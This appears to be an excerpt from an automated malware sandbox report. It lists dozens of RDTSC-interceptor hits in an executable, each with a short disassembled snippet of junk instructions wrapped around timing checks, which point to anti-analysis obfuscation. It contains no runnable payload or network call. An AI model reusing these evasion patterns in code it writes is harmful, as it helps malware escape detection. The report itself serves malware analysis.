Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1016B35 second address: 1016B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 101668B second address: 10166A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36B8869C04h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10166A4 second address: 10166B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F36B8D8D086h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10167EF second address: 10167F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10167F5 second address: 10167F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10167F9 second address: 10167FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10223AD second address: 10223B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1023FA8 second address: 1023FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1023FAC second address: 1023FB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1023FB2 second address: 1023FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1023FB8 second address: 1023FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1023FBC second address: 1023FDC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36B8869BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F36B8869BF6h 0x00000013 jmp 00007F36B8869BFBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1024124 second address: 1024167 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F36B8D8D08Ch 0x00000008 ja 00007F36B8D8D08Ch 0x0000000e jnc 00007F36B8D8D086h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F36B8D8D08Ch 0x0000001e jl 00007F36B8D8D086h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F36B8D8D097h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1024167 second address: 102417C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFBh 0x00000007 jnp 00007F36B8869BF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 102417C second address: 1024183 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1028BCC second address: 1028BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1028BD0 second address: 1028BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1031C6C second address: 1031CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F36B8869C10h 0x0000000c js 00007F36B8869BF6h 0x00000012 jmp 00007F36B8869C04h 0x00000017 popad 0x00000018 pushad 0x00000019 jc 00007F36B8869BFEh 0x0000001f jbe 00007F36B8869BF6h 0x00000025 push edx 0x00000026 pop edx 0x00000027 pushad 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1036E68 second address: 1036E74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1036CDF second address: 1036CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8869BFAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 103FE4A second address: 103FE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 103FE52 second address: 103FE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F36B8869BF6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 103FE61 second address: 103FE65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 103FE65 second address: 103FE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 103ED54 second address: 103ED76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F36B8D8D098h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 103EEC4 second address: 103EECA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 103F0A0 second address: 103F0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10438D2 second address: 10438F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8869C02h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F36B8869BF6h 0x00000014 jne 00007F36B8869BF6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10438F9 second address: 1043919 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36B8D8D097h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1043919 second address: 104391F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 104344A second address: 1043456 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007F36B8D8D086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1047817 second address: 104781D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1052A7C second address: 1052A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36B8D8D08Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10507E9 second address: 10507EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10507EF second address: 10507F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F36B8D8D086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 105F817 second address: 105F81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 105F81B second address: 105F833 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D092h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1060EB0 second address: 1060EBA instructions: 0x00000000 rdtsc 0x00000002 js 00007F36B8869C02h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1060EBA second address: 1060EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1060EC0 second address: 1060ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1077D53 second address: 1077D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jbe 00007F36B8D8D086h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F36B8D8D097h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1077D79 second address: 1077D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1077D7F second address: 1077D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1077FE9 second address: 1077FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F36B8869BF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 107842F second address: 1078435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1078435 second address: 1078439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1078439 second address: 1078465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F36B8D8D09Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F36B8D8D086h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1078465 second address: 1078469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 107BAE5 second address: 107BAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F36B8D8D086h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 107FC3F second address: 107FC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 107FE96 second address: 107FEF4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F36B8D8D088h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D18CFh], eax 0x00000019 popad 0x0000001a push dword ptr [ebp+122D24D0h] 0x00000020 mov dword ptr [ebp+12480286h], edi 0x00000026 call 00007F36B8D8D089h 0x0000002b jmp 00007F36B8D8D099h 0x00000030 push eax 0x00000031 jmp 00007F36B8D8D08Ch 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 107FEF4 second address: 107FEF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 107FEF8 second address: 107FEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 107FEFC second address: 107FF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jne 00007F36B8869BF6h 0x00000013 popad 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 107FF1A second address: 107FF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 107FF1F second address: 107FF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10818D4 second address: 10818E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10818E4 second address: 10818EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10814AA second address: 10814B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F36B8D8D086h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10833CD second address: 10833E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007F36B8869C05h 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9EF0F second address: F9EF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9EF15 second address: F9EF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A8040B second address: 4A8040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A8040F second address: 4A80415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A80415 second address: 4A8041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A8041B second address: 4A8041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A8041F second address: 4A804A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F36B8D8D08Bh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F36B8D8D094h 0x00000019 and ax, A168h 0x0000001e jmp 00007F36B8D8D08Bh 0x00000023 popfd 0x00000024 mov cx, FB5Fh 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov si, dx 0x00000031 pushfd 0x00000032 jmp 00007F36B8D8D093h 0x00000037 or cx, 5D5Eh 0x0000003c jmp 00007F36B8D8D099h 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A804A8 second address: 4A804AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A804AE second address: 4A804DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F36B8D8D090h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A804DE second address: 4A804ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A804ED second address: 4A80513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A80513 second address: 4A80517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A80517 second address: 4A8051D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4A8055D second address: 4A80563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0705 second address: 4AA0760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F36B8D8D091h 0x0000000b and al, FFFFFFD6h 0x0000000e jmp 00007F36B8D8D091h 0x00000013 popfd 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F36B8D8D08Ch 0x0000001d or si, DFF8h 0x00000022 jmp 00007F36B8D8D08Bh 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b movzx eax, bx 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0760 second address: 4AA0764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0764 second address: 4AA076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA076A second address: 4AA07A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F36B8869BFEh 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F36B8869C07h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA07A5 second address: 4AA07AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA07AB second address: 4AA07AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA07AF second address: 4AA07E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F36B8D8D099h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA07E0 second address: 4AA0814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F36B8869C09h 0x0000000a and cl, 00000016h 0x0000000d jmp 00007F36B8869C01h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0814 second address: 4AA0892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 pushfd 0x00000006 jmp 00007F36B8D8D098h 0x0000000b add si, B568h 0x00000010 jmp 00007F36B8D8D08Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b movzx eax, dx 0x0000001e movsx edx, si 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007F36B8D8D094h 0x0000002b pop eax 0x0000002c pushfd 0x0000002d jmp 00007F36B8D8D08Bh 0x00000032 adc ah, 0000000Eh 0x00000035 jmp 00007F36B8D8D099h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0892 second address: 4AA090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F36B8869BFCh 0x00000010 pushfd 0x00000011 jmp 00007F36B8869C02h 0x00000016 xor si, 1EE8h 0x0000001b jmp 00007F36B8869BFBh 0x00000020 popfd 0x00000021 popad 0x00000022 lea eax, dword ptr [ebp-04h] 0x00000025 jmp 00007F36B8869C06h 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F36B8869C07h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA090D second address: 4AA0925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D094h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0925 second address: 4AA0929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0993 second address: 4AA0999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0999 second address: 4AA09C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F36B8869BFAh 0x00000016 rdtsc
